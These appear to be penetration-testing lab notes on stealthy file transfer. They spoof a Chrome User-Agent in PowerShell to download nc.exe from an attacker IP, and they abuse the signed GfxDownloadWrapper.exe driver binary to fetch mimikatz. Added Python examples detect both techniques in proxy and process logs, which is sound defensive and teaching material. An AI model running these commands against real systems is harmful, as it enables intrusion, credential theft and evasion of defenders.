Every HTTP/HTTPS request carries a User-Agent header, so an IDS/IPS can filter or flag requests on it, including the default one sent when we use PowerShell or a terminal tool.
User agents can be changed to "look" normal.
List all user agents on PowerShell:
PS C:\htb>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
Downloading file pretending to be a Chrome User Agent
Set up listener on attacking machine:
Momothechi@htb[/htb]$ nc -lvnp 80
Setting Chrome User Agent on compromised machine:
PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Downloading the file on compromised machine:
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
Application whitelisting may prevent using PowerShell or Netcat; command-line logging may also alert defenders.
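What the User-Agent trick above looks like from the proxy side, as an added example that is not part of the original notes: a small scanner over constructed proxy log lines that flags PowerShell's default User-Agent, flags browser User-Agents that carry the "Windows NT; Windows NT 10.0" platform token the PSUserAgent presets produce (compare the listing from the GetProperties() command above), and, because a User-Agent can be set to anything, also flags executable downloads from unapproved hosts regardless of User-Agent. The log format, the sample lines and the APPROVED_DOWNLOAD_HOSTS allowlist are assumptions made for the example.

```python
"""Scan proxy log lines for file transfers that hide behind a browser User-Agent.

Added example for these notes, not part of the original page. It assumes a
constructed, space-separated log format:
    client_ip method url status user_agent...
All sample lines and the allowlist below are constructed for the example.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample log lines. The first carries PowerShell's default
# User-Agent; the second uses a PSUserAgent-style "Chrome" string, whose
# platform token reads "Windows NT; Windows NT 10.0" (real Chrome sends
# "Windows NT 10.0; Win64; x64"); the third is ordinary browsing.
SAMPLE_LOG = """\
10.10.14.5 GET http://10.10.10.32/nc.exe 200 Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
10.10.14.5 GET http://10.10.10.32/nc.exe 200 Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
10.10.14.7 GET https://www.example.com/index.html 200 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
"""

# Hosts from which executable downloads are expected (constructed allowlist).
APPROVED_DOWNLOAD_HOSTS = {"updates.example.com"}

DEFAULT_PS_UA = re.compile(r"\bWindowsPowerShell/", re.IGNORECASE)
# Platform token present in the PSUserAgent presets but not in real browsers.
PSUSERAGENT_PLATFORM = re.compile(r"\(Windows NT; Windows NT \d")
EXECUTABLE_PATH = re.compile(r"\.(exe|dll|ps1|bat|msi|scr)$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    client: str
    url: str
    reason: str


def parse_line(line: str):
    """Split one log line into its fields; returns None for malformed lines."""
    parts = line.strip().split(" ", 4)
    if len(parts) != 5:
        return None
    client, method, url, status, user_agent = parts
    return {"client": client, "method": method, "url": url,
            "status": status, "user_agent": user_agent}


def analyze_request(rec: dict) -> list[Finding]:
    """Return every reason a single request deserves analyst attention."""
    findings = []
    ua, url = rec["user_agent"], rec["url"]
    if DEFAULT_PS_UA.search(ua):
        findings.append(Finding(rec["client"], url, "default PowerShell User-Agent"))
    elif PSUSERAGENT_PLATFORM.search(ua):
        findings.append(Finding(rec["client"], url,
                                "browser User-Agent matches a PSUserAgent preset"))
    # The User-Agent is attacker-controlled, so the content check runs regardless.
    parsed = urlparse(url)
    if EXECUTABLE_PATH.search(parsed.path) and parsed.hostname not in APPROVED_DOWNLOAD_HOSTS:
        findings.append(Finding(rec["client"], url,
                                "executable download from unapproved host"))
    return findings


def analyze_log(log_text: str) -> list[Finding]:
    """Run the request checks over every well-formed line of a log."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            findings.extend(analyze_request(rec))
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f.client} -> {f.url}: {f.reason}")
```

The point of the third check is that swapping the User-Agent defeats the first two, so a rule set that keys only on "WindowsPowerShell/" misses the spoofed transfer; what the spoof cannot change is that an .exe was fetched from a host that never serves software.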
Using already-installed driver binaries to transfer files. Need to check LOLBin/GTFOBins for binaries that may apply.
e.g. GfxDownloadWrapper.exe (Intel graphics driver) contains functionality to download config files periodically.
PS C:\htb> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
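Because a signed driver helper fetching a URL is normal for that binary, the detection angle is not the process itself but its arguments. The following is an added example, not part of the original notes, that classifies constructed process-creation records (image path plus command line, as a Sysmon Event ID 1 or Security Event ID 4688 record provides) and flags a download-capable binary when it fetches from a host outside its allowlist or writes an executable to disk. The DOWNLOAD_CAPABLE watchlist holds only the binary named on this page, the image paths and APPROVED_HOSTS are constructed placeholders, and arguments are assumed to be space separated.

```python
"""Flag download-capable signed binaries being used as file-transfer tools.

Added example for these notes, not part of the original page. Events are
reduced to a dict with "image" (full path) and "command_line". The
watchlist, sample events, image paths and allowlist are constructed for
the example; extend the watchlist from the LOLBAS/GTFOBins catalogues.
"""
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse

# Signed binaries known to fetch URLs as part of their normal job (only the
# one named in the notes; constructed watchlist).
DOWNLOAD_CAPABLE = {"gfxdownloadwrapper.exe"}
# Hosts those binaries legitimately talk to (constructed placeholder).
APPROVED_HOSTS = {"driver-updates.vendor.example"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
EXECUTABLE_RE = re.compile(r"\.(exe|dll|ps1|bat|msi|scr)[\"']?$", re.IGNORECASE)

# Constructed sample events: the transfer from the notes, a benign-looking
# config refresh from the allowlisted host, and an unrelated process.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\DriverStore\FileRepository\constructed_driver\GfxDownloadWrapper.exe",
     "command_line": r'GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"'},
    {"image": r"C:\Windows\System32\DriverStore\FileRepository\constructed_driver\GfxDownloadWrapper.exe",
     "command_line": r'GfxDownloadWrapper.exe "https://driver-updates.vendor.example/gfx.cfg" "C:\ProgramData\Vendor\gfx.cfg"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\Public\notes.txt"},
]


def classify_event(event: dict) -> list[str]:
    """Return the reasons one process-creation event is suspicious (empty if none)."""
    reasons = []
    name = PureWindowsPath(event["image"]).name.lower()
    if name not in DOWNLOAD_CAPABLE:
        return reasons
    cmd = event["command_line"]
    # Every URL the binary was told to fetch must point at an approved host.
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname
        if host not in APPROVED_HOSTS:
            reasons.append(f"{name} fetching from unapproved host {host}")
    # With the URLs removed, any remaining argument naming an executable is
    # the destination: a config downloader has no business writing .exe files.
    remaining_args = URL_RE.sub("", cmd).split()[1:]
    if any(EXECUTABLE_RE.search(arg) for arg in remaining_args):
        reasons.append(f"{name} writing an executable to disk")
    return reasons


def analyze_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Pair each flagged command line with its reasons; clean events are dropped."""
    results = []
    for event in events:
        reasons = classify_event(event)
        if reasons:
            results.append((event["command_line"], reasons))
    return results


if __name__ == "__main__":
    for command_line, reasons in analyze_events(SAMPLE_EVENTS):
        print(command_line)
        for reason in reasons:
            print("  -", reason)
```

The allowlist check is what keeps the rule quiet during the driver's own periodic config refresh; the destination check catches the case where the attacker hosts the payload on a domain that happens to be allowlisted, since the wrapper is still being asked to drop an executable.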